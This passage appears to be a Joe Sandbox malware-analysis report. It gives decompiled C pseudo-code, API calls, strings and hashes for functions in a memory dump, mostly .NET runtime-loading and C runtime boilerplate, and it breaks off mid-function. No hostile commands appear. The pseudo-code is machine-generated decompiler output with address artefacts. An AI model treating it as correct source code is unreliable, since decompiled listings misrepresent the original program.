csm, xrefs: 0024F588

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: ?terminate@@ExceptionFilterUnhandled__crt
String ID: csm
API String ID: 327099231-1018135373
Opcode ID: d8a0810ef37b632b2f0bbe607afdd69e151eb1ed655b2ac346b36d5ef849eef3
Instruction ID: d2f97daa476207e69e2c97603bcad91c3cd2eb58254e0af3532163407946abd4
Opcode Fuzzy Hash: d8a0810ef37b632b2f0bbe607afdd69e151eb1ed655b2ac346b36d5ef849eef3
Instruction Fuzzy Hash: 01E012F71242065B4BAC9F68968541973995B90311BD40475E848CB661DAA0DEB1C992

Uniqueness

Uniqueness Score: -1.00%

Function 0024D53A Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0459424f1116aad770ded283a34064420ff478638f7431598b181d6a31c336
Instruction ID: 515e982fcc113093bc8b9341a6cdcd2dd9e3cb9215dfa8f3b5e9b2f25e208636
Opcode Fuzzy Hash: 4c0459424f1116aad770ded283a34064420ff478638f7431598b181d6a31c336
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 002494E5 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E002494E5(void* __ebx, intOrPtr __ecx, void* __edi, signed short __esi, void* __eflags) {
				signed int _t68;
				signed short _t70;
				intOrPtr* _t75;
				signed int _t80;
				_Unknown_base(*)()* _t85;
				signed short _t93;
				signed short _t94;
				struct HINSTANCE__* _t95;
				signed short _t97;
				signed int* _t104;
				signed int _t125;
				void* _t133;
				void* _t137;
				signed short _t144;
				signed short _t145;

				_t137 = __eflags;
				_t126 = __esi;
				_push(0x438);
				E0024FB35(E0024FFAD, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t133 - 0x42c)) = __ecx;
				_t2 = _t133 + 0x14; // 0x2528e0
				_t125 =  *_t2;
				_t104 =  *(_t133 + 0x18);
				 *(_t133 - 0x428) =  *(_t133 - 0x428) & 0x00000000;
				if(E00249449(_t104, _t133 - 0x428, _t125, __esi, _t137) < 0) {
					L22:
					return E0024FAE4(_t104, _t125, _t126);
				}
				_t68 =  *(_t133 - 0x428);
				 *(_t133 - 0x430) = 0;
				 *0x2541d0(_t68, 0x40, 0, 0, 0, 0, _t125, _t104, _t133 - 0x430, 0x2412e8,  *((intOrPtr*)(_t133 - 0x42c)));
				_t70 =  *((intOrPtr*)( *_t68 + 0xc))();
				_t126 = _t70;
				if(_t70 == 0) {
					L19:
					__eflags = ( *(_t133 - 0x430) & 0x00000003) - 1;
					if(( *(_t133 - 0x430) & 0x00000003) == 1) {
						_t75 =  *((intOrPtr*)( *((intOrPtr*)(_t133 - 0x42c))));
						 *0x2541d0(_t75);
						_t126 =  *((intOrPtr*)( *((intOrPtr*)( *_t75 + 0x34))))();
					}
					L21:
					goto L22;
				}
				 *(_t133 - 0x424) = 0x100;
				__imp__wcscpy_s(_t133 - 0x210, 0x100, L"v4.0.0");
				_t80 =  *(_t133 - 0x428);
				 *0x2541d0(_t80, 0x48, 0, 0, _t133 - 0x210, _t133 - 0x424, _t125, _t104, _t133 - 0x430, 0x2412e8,  *((intOrPtr*)(_t133 - 0x42c)));
				_t126 =  *((intOrPtr*)( *_t80 + 0xc))();
				_t140 = _t126;
				if(_t126 == 0) {
					goto L19;
				}
				 *(_t133 - 0x424) =  *(_t133 - 0x424) & 0x00000000;
				if(E00249229(_t104, _t133 - 0x424, _t125, _t126, _t140) < 0) {
					goto L22;
				}
				 *((short*)(_t133 - 0x43c)) = 0;
				 *((intOrPtr*)(_t133 - 0x434)) = _t133 - 0x440;
				 *(_t133 - 4) = 2;
				_t85 = GetProcAddress( *(_t133 - 0x424), "GetRequestedRuntimeInfo");
				if(_t85 != 0) {
					 *(_t133 - 0x438) = _t85;
					_t126 = 0;
					__eflags = 0;
					L8:
					_t144 = _t126;
					L9:
					if(_t144 < 0) {
						L15:
						 *(_t133 - 4) =  *(_t133 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t133 - 0x434)) = _t133 - 0x440;
						 *(_t133 - 4) =  *(_t133 - 4) | 0xffffffff;
						E00249CE6(_t133 - 0x440);
						goto L21;
					}
					 *(_t133 - 0x444) = 0x104;
					 *(_t133 - 0x428) = 0x104;
					 *0x2541d0(0, 0, 0, 0, 0x41, _t133 - 0x420, 0x104, _t133 - 0x444, _t133 - 0x218, 0x104, _t133 - 0x428);
					_t93 =  *( *(_t133 - 0x438))();
					_t126 = _t93;
					_t145 = _t93;
					if(_t145 < 0) {
						goto L15;
					}
					if(_t145 != 0) {
						L14:
						_t126 = 0x80131700;
						goto L15;
					}
					 *(_t133 - 0x424) =  *(_t133 - 0x424) & 0x00000000;
					_t94 = E0024933F(_t104, _t133 - 0x424, _t125, _t126, _t145);
					_t126 = _t94;
					if(_t94 < 0) {
						goto L15;
					}
					_t95 =  *(_t133 - 0x424);
					 *0x2541d0(_t95, _t133 - 0x218, 0x2412e8,  *((intOrPtr*)(_t133 - 0x42c)));
					_t97 =  *((intOrPtr*)(_t95->i + 0xc))();
					_t126 = _t97;
					if(_t97 == 0) {
						__eflags = _t125;
						if(_t125 != 0) {
							__imp__wcsncpy_s(_t125,  *_t104, _t133 - 0x218,  *(_t133 - 0x428));
							 *_t104 =  *(_t133 - 0x428);
						}
						 *(_t133 - 4) =  *(_t133 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t133 - 0x434)) = _t133 - 0x440;
						_t59 = _t133 - 4;
						 *_t59 =  *(_t133 - 4) | 0xffffffff;
						__eflags =  *_t59;
						E00249CE6(_t133 - 0x440);
						goto L19;
					}
					goto L14;
				}
				_t126 = GetLastError();
				if(_t126 <= 0) {
					goto L9;
				}
				_t126 = _t126 & 0x0000ffff | 0x80070000;
				goto L8;
			}

0x002494e5
0x002494e5
0x002494e5
0x002494ef
0x002494f4
0x002494fa
0x002494fa
0x00249503
0x00249506
0x00249514
0x00249755
0x0024975a
0x0024975a
0x00249520
0x00249539
0x00249548
0x0024954e
0x00249551
0x00249555
0x0024972d
0x00249735
0x00249737
0x0024973f
0x00249749
0x00249751
0x00249751
0x00249753
0x00000000
0x00249753
0x00249566
0x00249573
0x00249579
0x002495b0
0x002495b9
0x002495bb
0x002495bd
0x00000000
0x00000000
0x002495c3
0x002495d7
0x00000000
0x00000000
0x002495e3
0x002495ec
0x002495f2
0x00249604
0x0024960c
0x00249625
0x0024962b
0x0024962b
0x0024962d
0x0024962d
0x0024962f
0x0024962f
0x002496d0
0x002496d0
0x002496da
0x002496e0
0x002496e6
0x00000000
0x002496e6
0x00249655
0x00249663
0x00249676
0x0024967c
0x0024967e
0x00249680
0x00249682
0x00000000
0x00000000
0x00249684
0x002496cb
0x002496cb
0x00000000
0x002496cb
0x00249686
0x00249693
0x00249698
0x0024969c
0x00000000
0x00000000
0x0024969e
0x002496bc
0x002496c2
0x002496c5
0x002496c9
0x002496ed
0x002496ef
0x00249701
0x00249710
0x00249710
0x00249712
0x0024971c
0x00249722
0x00249722
0x00249722
0x00249728
0x00000000
0x00249728
0x00000000
0x002496c9
0x00249614
0x00249618
0x00000000
0x00000000
0x0024961d
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 002494EF

Part of subcall function 00249449: __EH_prolog3.LIBCMT ref: 00249450

wcscpy_s.MSVCR120_CLR0400 ref: 00249573

Part of subcall function 00249229: __EH_prolog3.LIBCMT ref: 00249230
Part of subcall function 00249229: LoadLibraryExW.KERNEL32(mscoree.dll,00000000,00000000,00000008,002492FA,?,?,002412C8,?,0024936E,0024985C,0000000C,00249425,?,?,0024985C), ref: 00249249
Part of subcall function 00249229: GetLastError.KERNEL32(?,?,002412C8,?,0024936E,0024985C,0000000C,00249425,?,?,0024985C,?,00000000), ref: 00249255

GetProcAddress.KERNEL32(00000000,GetRequestedRuntimeInfo), ref: 00249604
GetLastError.KERNEL32 ref: 0024960E
wcsncpy_s.MSVCR120_CLR0400 ref: 00249701

Strings

(%, xrefs: 002494FA, 00249533, 00249597, 00249700
GetRequestedRuntimeInfo, xrefs: 002495F9
v4.0.0, xrefs: 00249560

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: ErrorH_prolog3Last$AddressH_prolog3_LibraryLoadProcwcscpy_swcsncpy_s
String ID: GetRequestedRuntimeInfo$v4.0.0$(%
API String ID: 408365154-3736536381
Opcode ID: a277dbecc57ae05192691fa622f9af0050962bd21d0ddc2254fca57dac6e2bf1
Instruction ID: 728683c3e3374c595e91000778ff1971e9b13c1ef240d484e5ccd4b6d4522940
Opcode Fuzzy Hash: a277dbecc57ae05192691fa622f9af0050962bd21d0ddc2254fca57dac6e2bf1
Instruction Fuzzy Hash: 2D6170B1A102299FDB24DF64CC45B9EB7B8EB48714F4041D9FA09A7290DB70AED0CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0024A0BD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0024A0BD(void* __ecx, void* __edx) {
				long _t2;
				signed int _t11;
				void* _t14;
				signed int _t17;
				long _t21;
				void* _t22;
				void* _t25;

				_t2 =  *0x25202c; // 0xffffffff
				_t14 = __edx;
				_t22 = __ecx;
				if(_t2 == 0xffffffff) {
					_t11 = TlsAlloc();
					_t21 = _t11;
					asm("lock cmpxchg [esi], ecx");
					if((_t11 | 0xffffffff) != 0xffffffff) {
						TlsFree(_t21);
					}
					_t2 =  *0x25202c; // 0xffffffff
					 *0x252028 = 0x24a0b0;
				}
				_t25 = TlsGetValue(_t2);
				if(_t25 != 0 || _t14 == 0) {
					L11:
					return _t25;
				} else {
					_t25 = HeapAlloc(GetProcessHeap(), 0, 0x58);
					if(_t25 != 0) {
						L10:
						_t17 = 0x16;
						memset(_t25, 0, _t17 << 2);
						TlsSetValue( *0x25202c, _t25);
						goto L11;
					}
					if(_t22 == 9 || _t22 == 6) {
						return 0;
					} else {
						RaiseException(0xc0000017, 0, 0, 0);
						goto L10;
					}
				}
			}

0x0024a0bd
0x0024a0c3
0x0024a0c7
0x0024a0cc
0x0024a0ce
0x0024a0d4
0x0024a0e0
0x0024a0e7
0x0024a0ea
0x0024a0ea
0x0024a0f0
0x0024a0f5
0x0024a0f5
0x0024a106
0x0024a10a
0x0024a156
0x00000000
0x0024a110
0x0024a122
0x0024a126
0x0024a140
0x0024a142
0x0024a147
0x0024a150
0x00000000
0x0024a150
0x0024a12b
0x00000000
0x0024a132
0x0024a13a
0x00000000
0x0024a13a
0x0024a12b

APIs

TlsAlloc.KERNEL32(?,?,?,0024A211), ref: 0024A0CE
TlsFree.KERNEL32(00000000,?,?,?,0024A211), ref: 0024A0EA
TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,0024A211), ref: 0024A100
GetProcessHeap.KERNEL32(00000000,00000058,?,?,?,0024A211), ref: 0024A115
HeapAlloc.KERNEL32(00000000,?,?,?,0024A211), ref: 0024A11C
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,?,0024A211), ref: 0024A13A
TlsSetValue.KERNEL32(00000000,?,?,?,0024A211), ref: 0024A150

Strings

, %, xrefs: 0024A0D6

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: AllocHeapValue$ExceptionFreeProcessRaise
String ID: , %
API String ID: 594535578-278304371
Opcode ID: 57550e37a2938a5156a488e1b6596c4ddab8efb954217a55b529ff5d6a47fd6f
Instruction ID: 1094282871fa4324f2b1a4bee4905cc3975d34b4325cc452e8f264acb45ec3ae
Opcode Fuzzy Hash: 57550e37a2938a5156a488e1b6596c4ddab8efb954217a55b529ff5d6a47fd6f
Instruction Fuzzy Hash: 191129326513119FC72D1F78BC4C627B6A997593767254225FB1DC33E0DA30CC94C669

Uniqueness

Uniqueness Score: -1.00%

Function 0024CC44 Relevance: 10.7, APIs: 7, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E0024CC44(void* __ebx, unsigned int* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				char _v20;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v60;
				intOrPtr _v68;
				void* _v72;
				void* _v80;
				void* _v88;
				void* _v584;
				void* _v600;
				char _v608;
				void* _v616;
				void* _v620;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				intOrPtr _t31;
				unsigned int _t34;
				signed int* _t35;
				signed int _t42;
				signed int _t44;
				intOrPtr* _t57;
				intOrPtr* _t63;
				signed char _t72;
				void* _t84;
				unsigned int _t87;
				void* _t90;
				unsigned int* _t92;
				void* _t95;
				signed int _t98;
				signed int _t100;

				_push(__ebx);
				_t92 = __ecx;
				_t57 = _a4;
				_t30 = ( *__ecx >> ( !(__ecx[2]) & 0x00000001)) - 1;
				if(_t30 == 0) {
					L2:
					_t63 = _t57;
					_t84 = _t63 + 2;
					do {
						_t31 =  *_t63;
						_t63 = _t63 + 2;
					} while (_t31 != 0);
					_t87 = (_t63 - _t84 >> 1) + 1;
					_t34 = ( *_t92 >> ( !(_t92[2]) & 0x00000001)) - 1;
					if(_t87 < _t34) {
						_t87 = _t34;
					}
					if(_t87 < 0x14) {
						_t87 = 0x14;
					}
					while(1) {
						_t87 = _t87 + _t87;
						_t35 = E0024D115(_t34, _t92, _t87, _t92, _t87, 4, 0);
						__imp___errno();
						 *_t35 =  *_t35 & 0x00000000;
						_t72 =  !(_t92[2]) & 0x00000001;
						_t34 =  *_t92 >> _t72;
						__imp___vsnwprintf_s(_t92[3], _t34, 0xffffffff, _t57, _a8);
						_t98 = _t98 + 0x14;
						if(_t34 >= 0) {
							goto L14;
						}
						__imp___errno();
						if( *_t34 == 0xc) {
							L16:
							E0024C377(_t72, _t84);
							asm("int3");
							_push(0xffffffff);
							_push(E00250560);
							_push( *[fs:0x0]);
							_t100 = (_t98 & 0xfffffff8) - 0x21c;
							_t42 =  *0x252018; // 0x199a43ea
							 *(_t100 + 0x214) = _t42 ^ _t100;
							_push(_t92);
							_push(_t87);
							_t44 =  *0x252018; // 0x199a43ea
							_push(_t44 ^ _t100);
							 *[fs:0x0] = _t100 + 0x228;
							_push(_t100 + 0x20);
							E0024A733(_t100 + 0x14, _t111);
							 *((intOrPtr*)(_t100 + 0x230)) = 1;
							E0024CC44(_t57, _t100 + 0x14,  *((intOrPtr*)(_t98 + 0xc)),  &_v20);
							E0024A87E(_t57,  *((intOrPtr*)(_t98 + 8)), _t84,  *((intOrPtr*)(_t98 + 8)), _t111, _t100 + 0xc);
							_v60 = _v60 | 0xffffffff;
							E0024A914( &_v608);
							 *[fs:0x0] = _v68;
							_pop(_t90);
							_t95 = _t72;
							return E0024F2C0(_t57,  *(_t100 + 0x214) ^ _t100, _t84, _t90, _t95);
						} else {
							__imp___errno();
							if( *_t34 == 0) {
								continue;
							} else {
								__imp___errno();
								if( *_t34 == 9) {
									continue;
								} else {
									__imp___errno();
									_t111 =  *_t34 - 0x22;
									if( *_t34 == 0x22) {
										continue;
									} else {
										_t72 = 0x80070459;
										E0024C282(_t57, 0x80070459, _t84, _t87, _t92, _t111);
										goto L16;
									}
								}
							}
						}
						goto L18;
					}
					goto L14;
				} else {
					_t34 = _t30 + 1;
					__imp___vsnwprintf_s(__ecx[3], _t34, 0xffffffff, _t57, _a8);
					_t98 = _t98 + 0x14;
					if(_t34 >= 0) {
						L14:
						E0024D115(_t34, _t92, _t87, _t92, _t34, 4, 1);
						_push(_t57);
						E0024A7B4(_t57,  &_v20, _t87, _t92, __eflags);
						return E0024A914( &_v20);
					} else {
						goto L2;
					}
				}
				L18:
			}

0x0024cc4a
0x0024cc4d
0x0024cc56
0x0024cc5e
0x0024cc61
0x0024cc7f
0x0024cc7f
0x0024cc83
0x0024cc86
0x0024cc86
0x0024cc89
0x0024cc8c
0x0024cc95
0x0024cca4
0x0024cca7
0x0024cca9
0x0024cca9
0x0024ccae
0x0024ccb2
0x0024ccb2
0x0024ccb3
0x0024ccb7
0x0024ccbc
0x0024ccc1
0x0024ccc7
0x0024ccd1
0x0024ccd4
0x0024cce0
0x0024cce6
0x0024cceb
0x00000000
0x00000000
0x0024cced
0x0024ccf6
0x0024cd4b
0x0024cd4b
0x0024cd50
0x0024cd57
0x0024cd59
0x0024cd64
0x0024cd65
0x0024cd6b
0x0024cd72
0x0024cd79
0x0024cd7a
0x0024cd7b
0x0024cd82
0x0024cd8a
0x0024cd9b
0x0024cda0
0x0024cda5
0x0024cdb9
0x0024cdc5
0x0024cdca
0x0024cdd6
0x0024cde2
0x0024cdea
0x0024cdeb
0x0024cdfd
0x0024ccf8
0x0024ccf8
0x0024cd01
0x00000000
0x0024cd03
0x0024cd03
0x0024cd0c
0x00000000
0x0024cd0e
0x0024cd0e
0x0024cd14
0x0024cd17
0x00000000
0x0024cd19
0x0024cd41
0x0024cd46
0x00000000
0x0024cd46
0x0024cd17
0x0024cd0c
0x0024cd01
0x00000000
0x0024ccf6
0x00000000
0x0024cc63
0x0024cc66
0x0024cc6e
0x0024cc74
0x0024cc79
0x0024cd1b
0x0024cd22
0x0024cd27
0x0024cd2b
0x0024cd3e
0x00000000
0x00000000
0x00000000
0x0024cc79
0x00000000

APIs

_vsnwprintf_s.MSVCR120_CLR0400 ref: 0024CC6E
_errno.MSVCR120_CLR0400 ref: 0024CCC1
_vsnwprintf_s.MSVCR120_CLR0400 ref: 0024CCE0
_errno.MSVCR120_CLR0400 ref: 0024CCED
_errno.MSVCR120_CLR0400 ref: 0024CCF8
_errno.MSVCR120_CLR0400 ref: 0024CD03
_errno.MSVCR120_CLR0400 ref: 0024CD0E

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: _errno$_vsnwprintf_s
String ID:
API String ID: 254546658-0
Opcode ID: 6cc741d12903caf934bc935585a9f3e3a7fe15f27bb2762088b6c887cf0f7433
Instruction ID: 8cf4d96c839c0cabcefba6fff3798f881755c372e8efa052a3ec4c24d6378573
Opcode Fuzzy Hash: 6cc741d12903caf934bc935585a9f3e3a7fe15f27bb2762088b6c887cf0f7433
Instruction Fuzzy Hash: 465149711106009FD729EF28DC89FBAB7A8FF94321F14462DF95E872D0DB309950CA65

Uniqueness

Uniqueness Score: -1.00%

Function 0024ECCA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,80004005,00000000), ref: 0024ECF4

Part of subcall function 0024DFD2: GetLastError.KERNEL32(0024E7FC,?,0024ECAF,?,?), ref: 0024DFD2

Strings

v4.0.30319, xrefs: 0024ED5E
mscorrc.dll, xrefs: 0024ED30

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: mscorrc.dll$v4.0.30319
API String ID: 2776309574-2820514680
Opcode ID: 6ceb4e1f55920022dbc9b6241f19e3d52c62aec266574c7f5c4b0c1de203e708
Instruction ID: 1f7fc39b0314dbf01c3dde89b18512663639477032084df8cce24bceedcd498c
Opcode Fuzzy Hash: 6ceb4e1f55920022dbc9b6241f19e3d52c62aec266574c7f5c4b0c1de203e708
Instruction Fuzzy Hash: 232151B1A1121CAFFF24DF949C88FFFB76CEB44705F110166F909D2140E6709E988A65

Uniqueness

Uniqueness Score: -1.00%

Function 002490DA Relevance: 10.5, APIs: 7, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E002490DA(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				signed int _v8;
				char _v8200;
				signed int _t9;
				int _t13;
				char* _t14;
				int _t16;
				void* _t20;
				void* _t23;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t25 = __esi;
				_t24 = __edi;
				_t23 = __edx;
				_t20 = __ebx;
				E0024FBE0(0x2004);
				_t9 =  *0x252018; // 0x199a43ea
				_v8 = _t9 ^ _t26;
				__imp___vsnwprintf_s( &_v8200, 0x1000, 0xffffffff, _a4,  &_a8);
				_t13 = IsDebuggerPresent();
				_t14 =  &_v8200;
				_push(_t14);
				if(_t13 == 0) {
					__imp____iob_func();
					_t16 = fwprintf(_t14 + 0x20, 0x2414d0);
					__imp____iob_func();
					fflush(_t16 + 0x20);
				} else {
					OutputDebugStringW();
				}
				return E0024F2C0(_t20, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x002490da
0x002490da
0x002490da
0x002490da
0x002490e2
0x002490e7
0x002490ee
0x00249106
0x0024910f
0x00249117
0x0024911d
0x0024911e
0x0024912d
0x00249137
0x0024913d
0x00249147
0x00249120
0x00249120
0x00249120
0x0024915d

APIs

_vsnwprintf_s.MSVCR120_CLR0400 ref: 00249106
IsDebuggerPresent.KERNEL32(?,?,0024999F,?,?), ref: 0024910F
OutputDebugStringW.KERNEL32(?,?,?,0024999F,?,?), ref: 00249120
__iob_func.MSVCR120_CLR0400 ref: 0024912D
fwprintf.MSVCR120_CLR0400 ref: 00249137
__iob_func.MSVCR120_CLR0400 ref: 0024913D
fflush.MSVCR120_CLR0400 ref: 00249147

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: __iob_func$DebugDebuggerOutputPresentString_vsnwprintf_sfflushfwprintf
String ID:
API String ID: 623727150-0
Opcode ID: e5fa1c4397881df6259eb6789a7d2005742cba1c0dddabe41e6b56f805f39697
Instruction ID: 648120498afe9d4b6c11e6739781c448fa15c77626cb7fc4c04bd7ea519420a9
Opcode Fuzzy Hash: e5fa1c4397881df6259eb6789a7d2005742cba1c0dddabe41e6b56f805f39697
Instruction Fuzzy Hash: A10181755103099BDB14BFA4FC4DA5AB778EF0830AB004161F60ED6191DA3096E4CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0024E804 Relevance: 9.2, APIs: 6, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0024E804(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t113;
				signed int _t116;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t132;
				signed int _t153;
				intOrPtr* _t173;
				signed int _t175;
				void* _t179;
				void* _t184;
				intOrPtr* _t185;
				signed int _t187;
				intOrPtr* _t190;
				intOrPtr* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				unsigned int* _t239;
				signed int _t240;
				void* _t241;
				unsigned int* _t242;
				unsigned int _t243;
				unsigned int* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t250;

				_push(0x278);
				E0024FBA1(E00250962, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t246 - 0x240)) = __ecx;
				 *((intOrPtr*)(_t246 - 0x23c)) = __ecx;
				 *((intOrPtr*)(_t246 - 0x254)) =  *((intOrPtr*)(_t246 + 8));
				 *((intOrPtr*)(_t246 - 0x248)) =  *((intOrPtr*)(_t246 + 0xc));
				_t237 = 0x80004005;
				_t173 =  *((intOrPtr*)(__ecx + 0x18));
				_t179 = _t173 + 2;
				_t235 = 0;
				do {
					_t113 =  *_t173;
					_t173 = _t173 + 2;
					_t254 = _t113;
				} while (_t113 != 0);
				_t175 = _t173 - _t179 >> 1;
				 *(_t246 - 0x234) = _t175;
				E0024C648(0x80004005, _t254);
				 *(_t246 - 0x274) = 0;
				 *((intOrPtr*)(_t246 - 0x270)) = 0;
				 *((intOrPtr*)(_t246 - 0x26c)) = 5;
				 *(_t246 - 4) = 1;
				_t116 =  *( *((intOrPtr*)(_t246 - 0x240)) + 0x20);
				 *(_t246 - 0x238) = _t116;
				if(_t116 == 0) {
					 *(_t246 - 0x250) = 0;
					 *(_t246 - 0x24c) = 0;
					 *(_t246 - 4) = 2;
					 *(_t246 - 4) = 3;
					_push( *0x252918);
					E0024E1DE(_t175, _t246 - 0x274, __edx, 0, 0x80004005, __eflags);
					 *(_t246 - 4) = 2;
					 *(_t246 - 4) = 1;
					__eflags =  *(_t246 - 0x250) & 0x00000002;
					if(( *(_t246 - 0x250) & 0x00000002) != 0) {
						E0024E15C();
					}
				} else {
					 *0x2541d0(_t246 - 0x274);
					_t237 =  *(_t246 - 0x238)();
				}
				if(_t237 != 0x8007000e) {
					 *((short*)(_t246 - 0x22c)) = 0;
					 *((short*)(_t246 - 0x20)) = 0;
					__eflags = 0;
					 *((short*)( *((intOrPtr*)(_t246 - 0x248)) + 0x206)) = 0;
					_t248 = _t247 - 0x14;
					E0024EE75( *((intOrPtr*)(_t246 - 0x248)), _t246 - 0x20, _t246 - 0x22c, _t246 - 0x22c);
					_t228 = _t246 - 0x20;
					_t184 = _t228 + 2;
					do {
						_t121 =  *_t228;
						_t228 = _t228 + 2;
						__eflags = _t121 - _t235;
					} while (_t121 != _t235);
					_t229 = _t228 - _t184;
					__eflags = _t229;
					_t230 = _t229 >> 1;
					 *(_t246 - 0x24c) = _t230;
					_t185 = _t246 - 0x22c;
					 *((intOrPtr*)(_t246 - 0x23c)) = _t185 + 2;
					do {
						_t123 =  *_t185;
						_t185 = _t185 + 2;
						__eflags = _t123 - _t235;
					} while (_t123 != _t235);
					_t187 = _t185 -  *((intOrPtr*)(_t246 - 0x23c)) >> 1;
					 *(_t246 - 0x238) = _t187;
					 *((intOrPtr*)(_t246 - 0x23c)) = _t230 + 1 + _t187 + _t175;
					__eflags =  *(_t246 - 0x274);
					if( *(_t246 - 0x274) <= 0) {
						L24:
						__eflags = _t237;
						if(_t237 < 0) {
							_t237 = E0024E7CF( *((intOrPtr*)(_t246 - 0x240)),  *((intOrPtr*)(_t246 - 0x254)),  *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x240)) + 0x18)));
						}
						L26:
						_t107 = _t246 - 4;
						 *_t107 =  *(_t246 - 4) | 0xffffffff;
						__eflags =  *_t107;
						E0024E299(_t246 - 0x274);
						goto L27;
					} else {
						goto L14;
					}
					do {
						L14:
						_t238 = _t235;
						_t190 = _t246 - 0x270;
						_t132 =  *((intOrPtr*)(_t246 - 0x26c));
						__eflags = _t235 - _t132;
						if(_t235 < _t132) {
							L16:
							_t239 =  *(_t190 + 8 + _t238 * 4);
							 *(_t246 - 0x234) = _t239;
							E0024A95D(_t175, _t239, _t235, _t239);
